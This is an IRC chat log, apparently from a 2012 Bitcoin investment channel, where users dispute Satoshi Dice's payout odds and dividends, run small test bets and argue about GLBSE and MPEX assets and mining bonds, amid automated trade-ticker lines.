Their claimed returns for shareholders match their claimed returns to users. Oct 03 20:02:30 That would be 0.0105*100, or 1.05 BTC if I'm not mistaken Oct 03 20:02:46 OneEyed: I've already performed several tests. I know what the result will be. Oct 03 20:02:53 I don't need you to do it for me. Oct 03 20:02:57 So, what did you find? Oct 03 20:03:03 If you want to see for yourself that SD is scamming, go ahead and test. Oct 03 20:03:11 I don't gamble :) Oct 03 20:03:22 Why would I play a game where the odds are against me, Oct 03 20:03:24 ? Oct 03 20:03:28 Their best claimed return address actuall returns less than 48% consistently in my tests that were performed over a several week period. Oct 03 20:03:51 [GLBSE] [RAREEARTH] 10 @ 0.00961001 = 0.0961 BTC [-] Oct 03 20:04:00 That is why I figured I'd invest with them.... But then the claimed dividend payment was less than 1/3 of what I was expecting after talking to mircea. Oct 03 20:04:03 GamblingMan: you should publish your results then, people would be interested in that. Oct 03 20:04:31 OneEyed: I tried once. Everyone bashed me and reacted like people did in here when I mentioned it. Oct 03 20:04:44 [GLBSE] [BITBOND] 1 @ 0.18620001 BTC [-] Oct 03 20:04:54 I was told that the stated odds "are just guidelines" Oct 03 20:05:07 When in fact their guidelines are 100% inflated. Oct 03 20:05:51 Ohhh, the min bet is 0.001, I thought it was 0.01, so the test could be done with 500 send for .75 BTC Oct 03 20:06:03 (including the fees Oct 03 20:06:04 Stating odds that are misleading and then claiming they're guidelines, is what makes me use the word scammer. Oct 03 20:06:05 ) Oct 03 20:06:31 OneEyed: Try it yourself with 100. Oct 03 20:06:40 You'll get 45% back. ;) Oct 03 20:06:51 If you use the address with the highest odds. Oct 03 20:07:22 I actually returned an average of 48% through all of my testing... Oct 03 20:07:33 Interesting Oct 03 20:09:12 Interesting indeed. Oct 03 20:09:28 Run a test, publish it, and prepare to be flamed. Oct 03 20:11:30 So you're talking about trying it with 1dice9wVtrKZTBbAZqz1XiTmboYyvpD3t? Oct 03 20:13:00 Let's do this with 100 x 0.001 runs from 1B7xUkzFcwsaviJQL1XfRJazj4zXC764i7 Oct 03 20:14:50 What is the stated return on the website for that address? Oct 03 20:15:19 Shit, transactions not accepted to memory pool, sucker, after some of them. I'll have to wait a bit to get 100 of them Oct 03 20:15:42 [GLBSE] [GSDPT] 300 @ 0.0033 = 0.99 BTC [-] Oct 03 20:15:59 GamblingMan: 98.1% Oct 03 20:16:19 [MPEX] [F.GIGA.ETF] 3740 @ 0.00045477 = 1.7008 BTC [-] Oct 03 20:16:38 Great. I'm expecting your test to return somewhere in the 45-55% range. Oct 03 20:21:02 is this ognasty again ? Oct 03 20:22:43 [GLBSE] [RAREEARTH] 10 @ 0.00999999 = 0.1 BTC [+] Oct 03 20:30:32 Either I'm doing something wrong with SatoshiDice, or something is wrong on their side… Oct 03 20:31:03 wha happened ? Oct 03 20:31:13 Look at http://blockchain.info/address/1B7xUkzFcwsaviJQL1XfRJazj4zXC764i7?filter=0 Oct 03 20:31:17 I send bets of 0.001 Oct 03 20:31:21 (the minimum bet) Oct 03 20:31:40 to the 97.9% win address, with an expected gain of 1.004x when I win Oct 03 20:31:46 aha Oct 03 20:31:58 And it pays back 0.00050442 Oct 03 20:32:04 so ? Oct 03 20:32:17 It's hardly 0.001 * 1.004 Oct 03 20:32:28 but it pays back both when you lose and when you win Oct 03 20:32:37 and it substracts 0.0005 in all cases topay miner fees Oct 03 20:33:00 I should win almost every time (97.9% of the time) Oct 03 20:33:12 But ok, the .0005 is deduced Oct 03 20:33:15 .py 0.001 * 1.004 - 0.0005 Oct 03 20:33:16 I thought *they* payed it :) Oct 03 20:33:20 Ok, makes sense Oct 03 20:33:22 Thanks :) Oct 03 20:33:28 0.000504 Oct 03 20:33:33 OneEyed im not an expert on the entire thing tbh, i just list em. Oct 03 20:33:35 Yes, makes perfect sense now Oct 03 20:33:43 there's a big ass independent audit thread in btctalk, want me to dig it ? Oct 03 20:33:48 No, I've read it Oct 03 20:33:56 I'm just checking some claims by GamblingMan Oct 03 20:33:58 those people are significantly more on the ball than i am Oct 03 20:34:09 And by doing so, I'm probably increasing his future dividends by 1 satoshi or so :) Oct 03 20:34:28 lol i re-read the list, seems to me unlikely he had any shares. Oct 03 20:35:34 Hence your ognasty remark, makes sense Oct 03 20:36:01 well there was some guy bashing by that name, also off webchat, yest i think Oct 03 20:36:17 Yes, I was here, using the same IP as OgNasty before Oct 03 20:36:21 but anyway, iirc AAPL paid something like .5% a year last, so Oct 03 20:36:24 we're safe on that score Oct 03 20:38:59 OneEyed: What were your results? Oct 03 20:39:32 GamblingMan: none, I stopped in the middle and changed the 1dice address in order to diversify the bets, but that should still average the advertised returns Oct 03 20:39:42 GamblingMan: I gave you the address, you can follow it yourself Oct 03 20:39:56 1B7xUkzFcwsaviJQL1XfRJazj4zXC764i7 Oct 03 20:40:09 I thought you'd post a nice %. I already know what your results will be... Oct 03 20:40:19 I wanted to see you post the number. Oct 03 20:40:31 GamblingMan: I wanted you to send me money to do the test Oct 03 20:40:34 97.9% - I think not. Oct 03 20:40:35 what is this, transactional psychology for beginners ? Oct 03 20:40:37 GamblingMan: one doesn't always get what he wants Oct 03 20:40:42 GamblingMan: did you deduce the fees? Oct 03 20:40:57 No, I pasted your expected return listed above. Oct 03 20:41:00 GamblingMan: it looks like .0005 are deduced from the gains Oct 03 20:41:22 [MPEX] [S.MPOE] 41736 @ 0.00036061 = 15.0504 BTC [+] Oct 03 20:41:29 Strange that a site like Satoshi Dice can't figure out how to send transactions with no fees... That is beginner BTC stuff. Oct 03 20:41:47 GamblingMan suppose it doesn't want to send them w/o a fee. Oct 03 20:42:10 I'm all for that. Oct 03 20:42:19 GamblingMan: if he did, they would not be relayed by standard bitcoind, and people would not see the result immediately Oct 03 20:42:26 ^he^it Oct 03 20:42:33 [GLBSE] [GOLD] 5 @ 0.00998999 = 0.0499 BTC [-] Oct 03 20:42:34 OneEyed anyway, the system whereby you pay post to me, i pay post to you seems pretty fair. Oct 03 20:42:37 mircea_popescu: You claimed in here that SD was the highest yielding asset on the GLBSE. Oct 03 20:42:43 Care to modify that statement? Oct 03 20:42:56 seeing how it's not an asset on the glbbq... Oct 03 20:42:57 mircea_popescu: yup Oct 03 20:43:00 i doubt i claimed that. Oct 03 20:43:02 It looks more like the lowest to me after seeing the last dividend. Oct 03 20:43:12 so sell out and invest in something else eh ? Oct 03 20:43:20 "i doubt i claimed that." - ridiculous Oct 03 20:43:36 I've sold off a few thousand shares already this morning. Oct 03 20:43:46 I guess I might as well cut my losses now and sell a few thousand more. Oct 03 20:44:02 good, so that's settled then. Oct 03 20:44:05 I doubt my asks will ever hit again... Oct 03 20:44:21 Hopefully they do, looks like I took out the decent bid walls. Oct 03 20:44:32 GamblingMan: are you using the GLBSE passthrough? Oct 03 20:44:41 [GLBSE] [GSDPT] 300 @ 0.003225 = 0.9675 BTC [-] Oct 03 20:44:43 about 66k at 0.32 i see. Oct 03 20:44:44 OneEyed: yes Oct 03 20:44:57 GamblingMan: you know that it retains an additional 5% of the dividends, right? Oct 03 20:45:01 .py 66000 * 0.00320000 Oct 03 20:45:05 211.2 Oct 03 20:45:09 coupla hundred btc to go. Oct 03 20:45:23 It would have to retain 80% of the dividends to make the yield even close to acceptable for that valuation. Oct 03 20:45:35 GamblingMan: so why did you buy in? Oct 03 20:45:52 mircea_popescu claimed it was the highest yielding asset. Oct 03 20:45:58 I took a risk without doing DD. Oct 03 20:46:00 Got burned. Oct 03 20:46:20 now I know that mircea_popescu is 100% full of shit. Oct 03 20:46:27 I am better off now. :) Oct 03 20:46:29 ahahaha this is ridiculous. Oct 03 20:47:13 mircea_popescu: you were in here bashing someone for not knowing "GSDPT is the highest yielding asset on GLBSE" Oct 03 20:47:28 Your claim was 100% wrong. Oct 03 20:47:53 well, actually mpoe.etf was for the longest time the highest yielding Oct 03 20:47:55 not gsdpt. Oct 03 20:48:09 course from what i hear mpoe.etf is closing down, so too late for that. Oct 03 20:48:13 mpoe.etf was NEVER the highest yielding asset. Oct 03 20:48:17 !pl mpoe.etf Oct 03 20:48:18 !pl [@] [] Oct 03 20:48:20 !pl mpoe.etf .1 Oct 03 20:48:21 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 03 20:48:23 Those types of claims are what make you full of shit. Oct 03 20:48:28 MPOE.ETF [1@0.1BTC] paid: 0.02470282 BTC. Last price: 0.3 BTC. Capital gain: 0.2 BTC. Total: 0.22470282 BTC. (224.7%) Oct 03 20:48:29 srsly. it ipo'd at .1 Oct 03 20:48:44 and i hear it's getting closed out at about 1 or something like that. Oct 03 20:49:16 Ok, here is my result. I had .15 at this address, I now have .06685859. I placed 80 + 24 bets (104 total), paying .0005 fees every time I sent and every time I won. I expected: .15 - .0015*104 + 80*(.001*.97653*1.04 - .0005*.97653) + 24*(.001*.244141*4.003 - .0005*.244141) Oct 03 20:49:18 Anyone can IPO anything at whatever they want and then stop selling cheap shares. I know you're familiar with manipulation. Oct 03 20:49:20 .py .15 - .0015*104 + 80*(.001*.97653*1.04 - .0005*.97653) + 24*(.001*.244141*4.003 - .0005*.244141) Oct 03 20:49:21 0.056711518152 Oct 03 20:49:31 So I lost less than expected Oct 03 20:49:34 S,MPOE It's going to be closed? Oct 03 20:49:51 Yeah, I'm lucky :) Oct 03 20:49:52 sgnb sgornick smickles Smoovious SNS SomeoneWeird SuprTiggr` Oct 03 20:49:55 (not enough to win money though) Oct 03 20:49:56 rdponticelli nope Oct 03 20:50:25 You should have stuck with the original test, but I assume after losing a few dozen times in a row using the 98% address, you gave up. ;) Oct 03 20:50:48 Someone buy my last 2,000 SD shares! Oct 03 20:50:48 No, I was already above the expectation. You can check itself, I've done no other transaction on this address Oct 03 20:51:07 I will not, in order to spend the last 0.05 I have there :) Oct 03 20:51:10 I meant MPOE.ETF... Anyway, do you know if smickles allow to redeem the shares for S.M?POE Oct 03 20:51:11 at this point im torn whether to ignore the idiot or keep him on for amusement purposes. Oct 03 20:51:14 rdponticelli that yes Oct 03 20:51:24 rdponticelli i think you'll have to ask him that Oct 03 20:51:31 ignore the idiot Oct 03 20:51:36 haha Oct 03 20:51:42 then beg more people to come in here. Oct 03 20:51:42 GamblingMan Garr255 Gladamas GoMaD Graet gribble Grishnakh grubles Guest86490 guruvan guruvan- Oct 03 20:51:49 Yeah, I intended asking, but hes away Oct 03 20:51:57 GamblingMan your input wasn't really solicited in the matter. Oct 03 20:52:11 ignore me? Oct 03 20:52:18 your input is worthless Oct 03 20:53:46 [MPEX] [S.MPOE] 3064 @ 0.00036061 = 1.1049 BTC [+] Oct 03 20:53:47 [MPEX] [S.MPOE] 11574 @ 0.00036061 = 4.1737 BTC [+] Oct 03 20:53:49 [MPEX] [S.MPOE] 4918 @ 0.00035964 = 1.7687 BTC [-] Oct 03 20:53:50 [MPEX] [S.MPOE] 20444 @ 0.00035946 = 7.3488 BTC [-] Oct 03 20:54:14 ;;ticker Oct 03 20:54:15 Best bid: 12.72, Best ask: 12.8, Bid-ask spread: 0.08000, Last trade: 12.8, 24 hour volume: 34946, 24 hour low: 12.55, 24 hour high: 12.8999 Oct 03 20:54:18 .py 14.3961 * 12.72 Oct 03 20:54:19 [GLBSE] [GSDPT] 700 @ 0.003225 = 2.2575 BTC [-] Oct 03 20:54:20 183.118392 Oct 03 20:54:27 just a few more to sell now... Oct 03 20:54:46 Sucks to take a loss on this crap, but it is what a deserve for funneling money to Mpex. Oct 03 20:54:48 lesson learned. Oct 03 20:54:49 Shit, I managed to increase the balance while trying to empty it :) Oct 03 20:55:14 I'll try harder Oct 03 20:55:42 Buy my SD shares with it! Oct 03 20:55:55 You can probably buy a few thousand shares. Oct 03 20:56:38 GamblingMan: I won't, you told me it was a bad deal :) Oct 03 20:56:44 [GLBSE] [GSDPT] 5 @ 0.003201 = 0.016 BTC [-] Oct 03 20:56:47 Smart man. Oct 03 20:56:54 [GLBSE] [ASICMINER] 36 @ 0.1091 = 3.9276 BTC [+] Oct 03 20:56:55 [GLBSE] [ASICMINER] 64 @ 0.109 = 6.976 BTC [-] Oct 03 20:57:52 SELL SELL SELL Oct 03 20:57:56 [GLBSE] [GSDPT] 38 @ 0.0032 = 0.1216 BTC [-] Oct 03 20:58:07 Shit, won again Oct 03 20:58:27 [GLBSE] [GSDPT] 100 @ 0.0032 = 0.32 BTC [-] Oct 03 20:58:49 it boggles me. do you actually think causing further panic on glbse hurts me somehow ?! Oct 03 20:58:54 Argh, more than .10 now! Oct 03 20:59:30 OneEyed: Only an 80% loss? You're rocking that 98% address. lol Oct 03 20:59:46 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 20:59:51 GamblingMan: you're kidding? I started with 0.15, 0.05 being for the fees! Oct 03 21:00:04 [GLBSE] [YARR] 1 @ 1 BTC [+] Oct 03 21:00:09 I played 128 games so far, with 0.0005 in fees every time Oct 03 21:00:15 And 0.0005 deduced from every win Oct 03 21:00:21 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:00:48 I'm at 0.09154748 BTC now Oct 03 21:00:49 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:01:02 I have more than the original 0.15 amount minus the fees Oct 03 21:01:02 really tho, if it were up to me i'd make the fee larger. Oct 03 21:01:12 there's really little benefit in all the btcdust transactions Oct 03 21:01:28 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:01:42 I agree. At least a higher fee would benefit mining pool owners. Oct 03 21:01:47 GamblingMan: but I've no doubt I'll loose everything, but right now, my returns are more than 100% if you remove the fees (which were high because I chose to start with .001 + .0005 of fees) Oct 03 21:01:52 [GLBSE] [CBGB] 2 @ 0.48 = 0.96 BTC [-] Oct 03 21:02:09 So if the game is flawed, it's biased towards me right now, I guess that's why you get low dividends :) Oct 03 21:02:17 Ok, now let's lose those .9 for good Oct 03 21:02:32 ;;seen usagi Oct 03 21:02:32 usagi was last seen in #bitcoin-assets 2 hours, 40 minutes, and 29 seconds ago: I can bounce back but it would really piss me off Oct 03 21:02:35 (oops, .09, not .9) Oct 03 21:03:00 Why would usagi bouncing back piss him off? Oct 03 21:03:10 OneEyed actually they did have a shit month, about half down from statistical expectation Oct 03 21:03:42 I have a feeling that next month will be even shittier. ;) Oct 03 21:03:51 Anyone want to bet on THAT? Oct 03 21:03:58 i remember even a decade ago, the shills were a lot better. Oct 03 21:04:18 Same shill from 2 decades ago right here. ;) Oct 03 21:04:20 GamblingMan if you were someone, as opposed to random anon you could prolyl borrow shares and sell them for your bet. Oct 03 21:04:32 borrow shares? Oct 03 21:04:43 Why would I want to pay interest to own shitty shares? Oct 03 21:05:15 you're new at this entire finance thing are you. Oct 03 21:05:19 I expect the interest on borrowing would be higher than the dividends. Oct 03 21:05:35 I'm not a finance expert if that is what you're asking. Oct 03 21:05:50 I'm just a guy with a shit ton of BTC and was looking to put some of it to work. Oct 03 21:06:07 Satoshi Dice was a bad first investment. Oct 03 21:06:26 Yeah, I ended up with 1 satoshi on this address Oct 03 21:06:33 So let me ask you this mircea_popescu: What is the worst investment I could make on the GLBSE? Oct 03 21:06:46 i have no ideea, i don't follow that much. Oct 03 21:06:47 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:07:14 C'mon. I really would like to buy the worst asset in your opinion and track the results of it vs. SD Oct 03 21:07:25 Give me a guarenteed loser. Oct 03 21:07:43 GamblingMan Garr255 Gladamas GoMaD Graet Grishnakh Guest86490 Oct 03 21:07:46 ignore GamblingMan ALL Oct 03 21:07:46 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:08:14 I guess he doesn't like giving investment advice now? Oct 03 21:08:29 He was quick to recommend Satoshi Dice before... Oct 03 21:08:35 Now I can't even get a crap recommendation... Oct 03 21:08:37 I'll guess this transaction will take a long time to be included in the blockchain, 1 satoshi and no fee: http://blockchain.info/tx/7fd45788453c8da25498335623a52acc9215071543b2f1055773ac33321bbceb Oct 03 21:09:13 Nobody likes my 69 share trades? Oct 03 21:09:43 GamblingMan!*@* added to ignore list. Oct 03 21:10:03 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:11:04 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:11:24 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:12:14 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:14:32 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:16:10 [14:06] So let me ask you this mircea_popescu: What is the worst investment I could make on the GLBSE? Oct 03 21:16:14 probably a dead asset.. Oct 03 21:16:31 such as... what ? all of them ? Oct 03 21:17:16 lol, like mircea's biggest expert on glbse :) Oct 03 21:17:23 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:18:53 [MPEX] [S.MPOE] 23856 @ 0.00035946 = 8.5753 BTC [-] Oct 03 21:18:54 [MPEX] [S.MPOE] 24100 @ 0.00035943 = 8.6623 BTC [-] Oct 03 21:18:55 [MPEX] [S.MPOE] 11544 @ 0.00035922 = 4.1468 BTC [-] Oct 03 21:19:11 mircea dont act like glbse lists only scams and death assets to make mpex look good, its not cool Oct 03 21:19:26 GamblingMan.. and what do you guess about me? Oct 03 21:19:44 [GLBSE] [BITCOINTORRENTZ] 2 @ 0.35 = 0.7 BTC [+] Oct 03 21:20:02 you can visit coinbr.com to improve your guess Oct 03 21:20:29 yep Oct 03 21:20:43 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:21:01 [GLBSE] [MOVETO.FUND] 1 @ 0.57000001 BTC [-] Oct 03 21:21:01 [GLBSE] [MOVETO.FUND] 1 @ 0.57 BTC [-] Oct 03 21:21:17 it's pretty much nicely explained on it Oct 03 21:21:45 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:21:56 i'd like to know what would you say about GamblingMan, if you forgot that was you Oct 03 21:22:19 If. Oct 03 21:23:01 yes. and i'm too lazy to open it.. am not alone it sems Oct 03 21:23:03 *seems Oct 03 21:23:44 [GLBSE] [JLP-BMD] 1 @ 0.07110001 BTC [-] Oct 03 21:23:45 [GLBSE] [JLP-BMD] 35 @ 0.0711 = 2.4885 BTC [-] Oct 03 21:23:49 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:24:58 [GLBSE] [GSDPT] 53 @ 0.0032 = 0.1696 BTC [-] Oct 03 21:26:11 [GLBSE] [GIGAMINING] 1 @ 0.53999999 BTC [-] Oct 03 21:26:28 [GLBSE] [BMMO] 1 @ 0.03980004 BTC [-] Oct 03 21:26:30 [GLBSE] [BMMO] 1 @ 0.0398 BTC [-] Oct 03 21:31:40 [GLBSE] [JLP-BMD] 21 @ 0.0711 = 1.4931 BTC [-] Oct 03 21:31:42 [GLBSE] [JLP-BMD] 15 @ 0.071 = 1.065 BTC [-] Oct 03 21:32:16 [GLBSE] [M.ETF] 1 @ 0.103992 BTC [-] Oct 03 21:32:37 PsychoticBoy tis the sad truth of the matter. Oct 03 21:33:18 [GLBSE] [CPA] 1 @ 0.01999999 BTC [+] Oct 03 21:33:19 [GLBSE] [CPA] 1 @ 0.02 BTC [+] Oct 03 21:33:21 [GLBSE] [CPA] 1 @ 0.021 BTC [+] Oct 03 21:33:22 [GLBSE] [CPA] 1 @ 0.022 BTC [+] Oct 03 21:33:22 [GLBSE] [CPA] 1 @ 0.023 BTC [+] Oct 03 21:33:23 [GLBSE] [CPA] 1 @ 0.025 BTC [+] Oct 03 21:33:25 [GLBSE] [CPA] 1 @ 0.026 BTC [+] Oct 03 21:33:26 [GLBSE] [CPA] 1 @ 0.027 BTC [+] Oct 03 21:33:28 [GLBSE] [M.ETF] 13 @ 0.051 = 0.663 BTC [-] Oct 03 21:35:31 [GLBSE] [BITBOND] 1 @ 0.21089998 BTC [+] Oct 03 21:41:55 http://trilema.com/2012/how-does-one-list-on-mpex/ Oct 03 21:41:59 comments welcome. Oct 03 21:42:26 [GLBSE] [MIRCEAPOPESCU] 10 @ 0.021 = 0.21 BTC [+] Oct 03 21:43:02 ahaha nowai ? Oct 03 21:43:05 o. lol/ Oct 03 21:43:56 [MPEX] [F.GIGA.ETF] 1160 @ 0.00045477 = 0.5275 BTC [-] Oct 03 21:45:37 [GLBSE] [NASTY] 1 @ 0.4899 BTC [+] Oct 03 21:45:39 [GLBSE] [NASTY] 2 @ 0.49 = 0.98 BTC [+] Oct 03 21:48:23 wat?! Oct 03 21:48:35 [GLBSE] [GSDPT] 69 @ 0.0032 = 0.2208 BTC [-] Oct 03 21:49:09 mod6 trilema, now is english. Oct 03 21:58:10 [GLBSE] [DMC] 1 @ 0.07488989 BTC [+] Oct 03 21:58:12 [GLBSE] [DMC] 1 @ 0.0748899 BTC [+] Oct 03 21:58:47 gawd the forum-glbse-goat drama just keeps on givin'. Oct 03 21:59:12 w00t for more drama!!! Oct 03 22:00:56 urlpls Oct 03 22:01:15 https://bitcointalk.org/index.php?topic=112551.msg1241881#msg1241881 Oct 03 22:05:15 [GLBSE] [YABMC] 12 @ 0.07856 = 0.9427 BTC [-] Oct 03 22:06:39 [GLBSE] [GIGAMINING] 2 @ 0.54 = 1.08 BTC [+] Oct 03 22:08:50 [GLBSE] [OBSI.HRPT] 1 @ 0.00898799 BTC [+] Oct 03 22:08:52 [GLBSE] [OBSI.HRPT] 3 @ 0.008988 = 0.027 BTC [+] Oct 03 22:08:53 [GLBSE] [OBSI.HRPT] 15 @ 0.0089979 = 0.135 BTC [+] Oct 03 22:08:55 [GLBSE] [OBSI.HRPT] 20 @ 0.008998 = 0.18 BTC [+] Oct 03 22:08:56 [GLBSE] [OBSI.HRPT] 100 @ 0.009 = 0.9 BTC [+] Oct 03 22:08:57 [GLBSE] [OBSI.HRPT] 3 @ 0.00998 = 0.0299 BTC [+] Oct 03 22:08:57 [GLBSE] [OBSI.HRPT] 14 @ 0.01 = 0.14 BTC [+] Oct 03 22:09:01 [MPEX] [S.MPOE] 63900 @ 0.00036106 = 23.0717 BTC [+] Oct 03 22:09:02 [MPEX] [S.MPOE] 2389 @ 0.00036124 = 0.863 BTC [+] Oct 03 22:09:36 How can this usagi delete posts from his forum thread? Oct 03 22:10:05 why do you people keep switching your nicknames Oct 03 22:12:46 everyone can delete their own posts Oct 03 22:16:02 smickles: sorry, I have to turn you down on your accounting offer Oct 03 22:16:13 smickles: I think Im just going to continue buying back DMC until theres none left Oct 03 22:16:32 in which case accounting might even be detrimental :D Oct 03 22:16:46 http://uk.finance.yahoo.com/news/iran-crackdown-money-changers-currency-102042205.html Oct 03 22:16:49 iran needs bitcoin Oct 03 22:16:58 mircea_popescu: they execute people over there for using tor Oct 03 22:17:08 myea Oct 03 22:31:01 so mircea_popescu I was reading your recent post ( http://trilema.com/2012/how-does-one-list-on-mpex/ ) and can't help but wonder about potential listing son mpex. per the guidelines listed virtually no businesses qualify Oct 03 22:31:16 is there anything in the works to bring in new assets to mpex, or are you just letting that take care of itself? Oct 03 22:33:43 chang Oct 03 22:34:17 [MPEX] [F.GIGA.ETF] 1440 @ 0.00045477 = 0.6549 BTC [-] Oct 03 22:35:16 mircea_popescu: s^Kludge^Kluge, s^ideea^idea Oct 03 22:35:47 true^ Oct 03 22:36:34 Maybe s^financial business^financial instrument Oct 03 22:38:28 OneEyed the first is intentional. Oct 03 22:38:33 i'm that mean. Oct 03 22:38:47 :) Oct 03 22:38:51 Trilema was the BBS? Oct 03 22:39:13 taking the 5th Oct 03 22:39:18 :) Oct 03 22:39:57 and took out the business altogether. a financial. we can noun Oct 03 22:41:59 Fuck your link to David Thorne site, last time I landed there I spent two hours reading it Oct 03 22:42:30 you're screwed. Oct 03 22:42:34 and his name is bo ftr. Oct 03 22:42:36 short for bob. Oct 03 22:43:52 "mircea_popescu | everyone can delete their own posts " no, he ask forum mods to delete users questions from the form threads he has started Oct 03 22:44:00 o ?1 and they do ? Oct 03 22:44:08 look like they do Oct 03 22:44:25 looks* Oct 03 22:44:33 AMAZING! :) Oct 03 22:44:33 o nowai ? Oct 03 22:44:47 femtotube: that's what I was asking earlier today, since it looked like some of the girl posts had been removed, I wondered if it was self-control or moderation Oct 03 22:44:50 [GLBSE] [DMC] 1 @ 0.0748899 BTC [+] Oct 03 22:44:52 Oops, was directed to mircea_popescu Oct 03 22:45:18 OneEyed there were ? Oct 03 22:45:21 o boy, she'll be livid. Oct 03 22:45:32 https://bitcointalk.org/index.php?topic=114921.0;topicseen look at this Oct 03 22:45:41 rightfully so Oct 03 22:45:54 https://bitcointalk.org/index.php?topic=114921.msg1241624#msg1241624 Oct 03 22:45:57 this is still there ? Oct 03 22:45:58 https://bitcointalk.org/index.php?topic=114921.msg1242516#msg1242516 Oct 03 22:46:25 hold on, my mistake I looked at the wrong url :) Oct 03 22:46:41 lol just because the nitwit deletes her content in a quote she makes Oct 03 22:46:46 doth not mean the forum mods are insane. Oct 03 22:47:36 mircea_popescu, is there anything in the works to bring in new assets to mpex, or are you just letting that take care of itself? Oct 03 22:47:41 huh... I almost thought that mods are gone mad too. Sorry Oct 03 22:47:57 Ignatius-bot there's a lot in the works, but these are finnicky things to do even when you're not working in btc Oct 03 22:48:47 my main focus is getting futures with delivery listed atm. which is... impossible, pretty much. Oct 03 22:48:53 [GLBSE] [ASICMINER] 23 @ 0.1099998 = 2.53 BTC [+] Oct 03 22:48:54 [GLBSE] [ASICMINER] 82 @ 0.11 = 9.02 BTC [+] Oct 03 22:50:00 New stuff about bitcoinica in #bitcoin-otc: phantomcircuit | as far as i can tell now bitcoinica has not ever been able to cover it's obligations Oct 03 22:50:16 phantomcircuit | and tihan seale aka wendon group has not EVER put funds into the business despite phantomcircuit | and tihan seale aka wendon group has not EVER put funds into the business despite repeatedly saying he has Oct 03 22:50:18 that was a rumor Oct 03 22:50:35 that bitcoinica was insolvent at the moment the consultancy took control Oct 03 22:50:47 Well, I guess phantomcircuit is quite a good source Oct 03 22:50:51 ikr Oct 03 22:51:22 OneEyed that's hardly new stuff. Oct 03 22:51:30 mircea_popescu: I haven't read it before Oct 03 22:51:32 the reason tihan got involved was simply that zhou was bleeding equity Oct 03 22:51:40 it's in emails published a while ago Oct 03 22:51:48 But I have never even used bitcoinca, so it was more like yet another movie to me Oct 03 22:51:55 i never used it either. Oct 03 22:52:25 I lost $7 Oct 03 22:52:45 OneEyed do you actually care to see it ? Oct 03 22:52:56 No :) Oct 03 22:56:08 mircea_popescu: oh so you're working on a system where users can take delivery or provide hash power for the contracts? Oct 03 22:56:35 no. i am working on a system where users can pay bitcoin and take WTI Oct 03 22:56:55 WTI == ? Oct 03 22:56:55 good, keep it as a bucket shop ;) Oct 03 22:57:15 light sweet crude. or whatever, really, as long as it's settled physically. Oct 03 22:57:37 this will be the driver making bitcoin cross the 1k usd barrier : when people finally figure out they can settle intl trade in commodities anon. Oct 03 22:57:43 will give the govt a hissy fit. Oct 03 22:58:11 lol Oct 03 22:58:36 mircea_popescu: I just realized that on your post, you don't answer the "how does one list on mpex". Shouldn't you at least give an email to use to propose you a new asset for MPEX? Oct 03 22:59:00 OneEyed no. Oct 03 22:59:05 femtotube: can you show us a fixed mh mining bond that does have actual hardware hashing? Oct 03 22:59:15 if they can;t find the email / irc in the faq im too beelitist for them. Oct 03 22:59:21 mircea_popescu: so this is more "What can be listed on MPEX?", not "How does one list on MPEX?". Oct 03 22:59:24 [MPEX] [S.MPOE] 13911 @ 0.00036124 = 5.0252 BTC [+] Oct 03 22:59:25 dub giga's neh ? Oct 03 22:59:26 [MPEX] [S.MPOE] 15589 @ 0.00036128 = 5.632 BTC [+] Oct 03 22:59:32 OneEyed stickler. Oct 03 22:59:42 mircea_popescu: gig has under half of the 200gh he has issued Oct 03 23:00:04 mmm Oct 03 23:00:09 thats sick Oct 03 23:00:17 i thought he had about 40% in gpus and about 90% in fpga ? Oct 03 23:00:17 I think bob and others have had an extra hard week buying off SR Oct 03 23:00:48 crack cocain is a helluva drug Oct 03 23:01:19 http://gigamining.com/mgpumon/ <-giga Oct 03 23:01:29 dub that's the gpu farm tho Oct 03 23:01:44 mircea_popescu: no, its pgas Oct 03 23:02:31 there's two tho. Oct 03 23:02:40 http://kcmo.gigamining.com:41080/ Oct 03 23:02:42 well theres a few gpus in there Oct 03 23:02:51 no listen. there's the one you linked. old one. and there's this new one Oct 03 23:03:07 thats still only 150gh total Oct 03 23:03:20 he has admitted this in the forum Oct 03 23:03:28 http://gigamining.com/ top links up there Oct 03 23:03:40 has YABMC ever shown evidense of having hashign to back it, beyond 'imsaguy has a farm' Oct 03 23:03:58 SUMMARY 51,231.88 + 99 so i guess you're right, like 150k Oct 03 23:04:08 how many blocks until reward cut Oct 03 23:04:13 still, 150k + the 4 rigs he has on order, i'd say it's pretty decent Oct 03 23:04:16 its been a lot less too Oct 03 23:04:19 Diablo-D3 it works out to november the 30th Oct 03 23:04:27 that soon? meh Oct 03 23:04:52 my point that for most bonds its only ever been loosely implied that there is hashing backing them Oct 03 23:05:15 and there is no way to tell or reason to care Oct 03 23:05:44 dub there's reason to care. way to tell is a little complex. Oct 03 23:07:59 I guess theres the implication that someone with a large farm is likely to continue having bitcoins Oct 03 23:08:21 dub mh bonds w/o a farm are like usagi insurance : they work great unless they become useful (ie, diff drops) Oct 03 23:08:26 but the contracts are quite clear, its not even suggested that the dividends come from mined coins Oct 03 23:08:31 in wehich case chain-of-default and "who would have thought of this" Oct 03 23:11:16 imo it takes teh same level of idiocy to assume mining bonds have hashing and that usagi has the money to actually insure shit Oct 03 23:12:16 the trust in mining bonds came from the issuers reputation 